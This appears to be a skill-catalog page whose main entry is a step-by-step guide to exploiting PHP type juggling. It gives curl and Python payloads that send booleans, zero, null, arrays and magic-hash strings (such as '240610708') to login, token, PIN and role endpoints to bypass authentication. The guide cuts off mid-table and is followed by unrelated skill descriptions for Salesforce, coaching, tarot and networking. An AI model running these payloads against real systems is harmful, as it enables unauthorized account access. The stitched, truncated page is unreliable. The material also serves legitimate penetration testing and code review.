exploiting-type-juggling-vulnerabilities
Exploit PHP type juggling vulnerabilities caused by loose comparison operators to bypass authentication, circumvent hash verification, and manipulate application logic through type coercion attacks.
What this skill does
# Exploiting Type Juggling Vulnerabilities
## When to Use
- When testing PHP web applications for authentication bypass vulnerabilities
- During assessment of password comparison and hash verification logic
- When testing applications using loose comparison (== instead of ===)
- During code review of PHP applications handling JSON or deserialized input
- When evaluating input validation that relies on type-dependent comparison
## Prerequisites
- Understanding of PHP type system and loose comparison behavior
- Knowledge of magic hash values (0e prefix) and their scientific notation interpretation
- Burp Suite for request manipulation and parameter type changing
- PHP development environment for testing payloads locally
- Collection of magic hash strings from PayloadsAllTheThings
- Ability to send JSON or serialized data to control input types
> **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
## Workflow
### Step 1 — Identify Type Juggling Candidates
```bash
# Look for PHP applications with:
# - Login/authentication forms
# - Password comparison endpoints
# - API endpoints accepting JSON input
# - Token/hash verification
# - Numeric comparison for access control
# Check if application accepts JSON input (allows type control)
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username":"admin","password":"test"}'
# If application normally uses form data, try JSON
# Form: username=admin&password=test
# JSON: {"username":"admin","password":true}
```
### Step 2 — Exploit Loose Comparison Authentication Bypass
```bash
# PHP loose comparison: 0 == "password" returns TRUE
# Send integer 0 as password via JSON
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username":"admin","password":0}'
# Send boolean true (TRUE == "any_string" in loose comparison)
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username":"admin","password":true}'
# Send empty array (array bypasses strcmp)
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username":"admin","password":[]}'
# Send null
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username":"admin","password":null}'
# PHP strcmp vulnerability: strcmp(array, string) returns NULL
# NULL == 0 is TRUE in loose comparison
curl -X POST http://target.com/login \
-d "username=admin&password[]=anything"
```
### Step 3 — Exploit Magic Hash Collisions
```bash
# PHP treats "0e..." strings as scientific notation (0 * 10^N = 0)
# If hash starts with "0e" followed by only digits, it equals 0 in loose comparison
# Magic MD5 hashes (all evaluate to 0 in loose comparison):
# "240610708" -> md5: 0e462097431906509019562988736854
# "QNKCDZO" -> md5: 0e830400451993494058024219903391
# "aabg7XSs" -> md5: 0e087386482136013740957780965295
# "aabC9RqS" -> md5: 0e041022518165728065344349536299
# If application compares md5(user_input) == stored_hash:
# And stored_hash starts with "0e" and contains only digits after
curl -X POST http://target.com/login \
-d "username=admin&password=240610708"
# Magic SHA1 hashes:
# "aaroZmOk" -> sha1: 0e66507019969427134894567494305185566735
# "aaK1STfY" -> sha1: 0e76658526655756207688271159624026011393
# Test with known magic hash values
for payload in "240610708" "QNKCDZO" "aabg7XSs" "aabC9RqS" "0e1137126905" "0e215962017"; do
echo -n "Testing: $payload -> "
curl -s -X POST http://target.com/login \
-d "username=admin&password=$payload" -o /dev/null -w "%{http_code}"
echo
done
```
### Step 4 — Exploit Comparison in Access Control
```bash
# Numeric comparison bypass
# If: if($user_id == $target_id) { // allow access }
# "0" == "0e12345" is TRUE (both evaluate to 0)
# String to integer conversion
# "1abc" == 1 is TRUE in PHP (string truncated to integer)
curl "http://target.com/api/user?id=1abc"
# Boolean comparison for role checking
# if($role == true) grants access to any non-empty string
curl -X POST http://target.com/api/action \
-H "Content-Type: application/json" \
-d '{"action":"delete","role":true}'
# Null comparison for optional checks
# if($token == null) might skip validation
curl -X POST http://target.com/api/verify \
-H "Content-Type: application/json" \
-d '{"token":0}'
```
### Step 5 — Exploit via Deserialization Input
```bash
# PHP json_decode() preserves types
# Attacker controls type via JSON: true, 0, null, []
# Bypass token verification
curl -X POST http://target.com/api/verify-token \
-H "Content-Type: application/json" \
-d '{"token":true}'
# Bypass numeric PIN verification
curl -X POST http://target.com/api/verify-pin \
-H "Content-Type: application/json" \
-d '{"pin":true}'
# Bypass with zero value
curl -X POST http://target.com/api/check-code \
-H "Content-Type: application/json" \
-d '{"code":0}'
# PHP unserialize() type juggling
# Craft serialized object with integer type instead of string
# s:8:"password"; -> i:0; (string "password" to integer 0)
```
### Step 6 — Automated Type Juggling Testing
```bash
# Test all common type juggling payloads against each parameter
# Using Burp Intruder with type juggling payload list
# Payload list for JSON-based testing:
# true
# false
# null
# 0
# 1
# ""
# []
# "0"
# "0e99999"
# "240610708"
# Python automation
python3 -c "
import requests
import json
url = 'http://target.com/api/login'
payloads = [True, False, None, 0, 1, '', [], '0', '0e99999', '240610708', 'QNKCDZO']
for p in payloads:
data = {'username': 'admin', 'password': p}
r = requests.post(url, json=data)
print(f'password={json.dumps(p):20s} -> Status: {r.status_code}, Length: {len(r.text)}')
"
```
## Key Concepts
| Concept | Description |
|---------|-------------|
| Loose Comparison (==) | PHP comparison that performs type coercion before comparing values |
| Strict Comparison (===) | PHP comparison requiring both value and type to match |
| Magic Hash | String whose hash starts with "0e" followed by digits, evaluating to 0 in loose comparison |
| Type Coercion | Automatic conversion between types (string to int, null to 0) during comparison |
| strcmp Bypass | Passing array to strcmp() returns NULL, which equals 0 in loose comparison |
| JSON Type Control | Using JSON input to send specific types (boolean, integer, null) to PHP endpoints |
| Scientific Notation | PHP interprets "0eN" strings as 0 in exponential notation during numeric comparison |
## Tools & Systems
| Tool | Purpose |
|------|---------|
| Burp Suite | HTTP proxy for changing parameter types in requests |
| PHP interactive shell | Local testing of type juggling behavior |
| PayloadsAllTheThings | Curated magic hash and type juggling payload lists |
| phpggc | PHP generic gadget chains for deserialization exploitation |
| Custom Python scripts | Automated type juggling payload testing |
| PHPStan/Psalm | Static analysis tools detecting loose comparisons in code |
## Common Scenarios
1. **Authentication Bypass via Boolean** — Send `"password": true` as JSON to bypass loose comparison password verification
2. **Magic Hash Collision** — Use known magic hash input ("240610708") whose MD5 starts with "0e" to match against stored hashes
3. **strcmp Array Bypass** — Send `password[]=anything` to make strcmp() return NULL, bypassing password comparison
4. **PIN/OTP Bypass** — Send integer 0 as verification code to match against "0e..." hash of the actual code
5. **Role Escalation** — Send `"role": true` to match any non-empty role string in loose comparison access checks
## Output Format
```
## Type Juggling Vulnerability Report
- **Target**: http://target.com
- **Language**: PHP 8.1
- **Framework**: Laravel
### Findings
| # | Endpoint | Parameter | Payload | Type | Related in General
modeling-omnistudio-epc-catalog
IncludedSalesforce Industries CME EPC product-modeling skill for Product2-based catalog creation. Use when creating EPC products, configuring product attributes, building offer bundles with Product Child Items, or reviewing EPC DataPack JSON metadata for product catalog changes. TRIGGER when: user creates or updates Product2 EPC records, AttributeAssignment payloads, AttributeMetadata/AttributeDefaultValues, Offer bundles, or ProductChildItem relationships. DO NOT TRIGGER when: designing OmniScripts/FlexCards/Integration Procedures (use building-omnistudio-omniscript, building-omnistudio-flexcard, or building-omnistudio-integration-procedure), implementing Apex business logic (use generating-apex), or troubleshooting deployment pipelines (use deploying-metadata).
relationship-science-coach
IncludedUse this skill for direct, practical adult relationship coaching: couples conflict, repair, trust, marriage, dating, flirting, attachment patterns, emotional connection, sex, desire differences, eroticism, kink negotiation, affection, love languages, breakups, and long-term passion. Draw on Gottman, EFT and Hold Me Tight, attachment science, modern sex research, Perel, Nagoski, Kerner, Schnarch, Love and Stosny, and flexible love-language tools. Be concrete and low-hedge. Redirect only for imminent danger, abuse, coercive control, minors, non-consent, self-harm, stalking, or medical/legal/psychiatric decisions.
building-sf-integrations
IncludedSalesforce integration architecture and runtime plumbing with 120-point scoring. Use this skill to set up Named Credentials, External Credentials, External Services, REST/SOAP callout patterns, Platform Events, and Change Data Capture. TRIGGER when: user sets up Named Credentials, External Services, REST/SOAP callouts, Platform Events, CDC, or touches .namedCredential-meta.xml files. DO NOT TRIGGER when: Connected App/OAuth config (use configuring-connected-apps), Apex-only logic (use generating-apex), or data import/export (use handling-sf-data).
venue-templates
IncludedAccess comprehensive LaTeX templates, formatting requirements, and submission guidelines for major scientific publication venues (Nature, Science, PLOS, IEEE, ACM), academic conferences (NeurIPS, ICML, CVPR, CHI), research posters, and grant proposals (NSF, NIH, DOE, DARPA). This skill should be used when preparing manuscripts for journal submission, conference papers, research posters, or grant proposals and need venue-specific formatting requirements and templates.
let-fate-decide
IncludedDraws the 12 Houses of the Zodiac Tarot spread to inject entropy into planning when prompts are vague, ambiguous, or casually delegated. Interprets the spread to guide next steps. Use when the user says 'let fate decide', 'YOLO', 'whatever', 'idk', or other nonchalant phrases, makes Yu-Gi-Oh references, or when you are about to arbitrarily pick between multiple reasonable approaches. Prefer over ask-questions-if-underspecified when the user's tone is casual or playful rather than precision-seeking.
net-ops
IncludedCross-platform network troubleshooting (Windows, macOS, Linux) via local or remote shell. Use for: DNS broken, can't resolve hostnames, nslookup/dig works but apps fail, NRPT, WFP, scutil, /etc/resolver, systemd-resolved, /etc/resolv.conf, NetworkManager, VPN DNS leak residue (ProtonVPN/Mullvad/WireGuard/AnyConnect), AV/firewall blocking DNS or DoH, Tailscale DNS interaction, intermittent connectivity, remote diagnostics over SSH.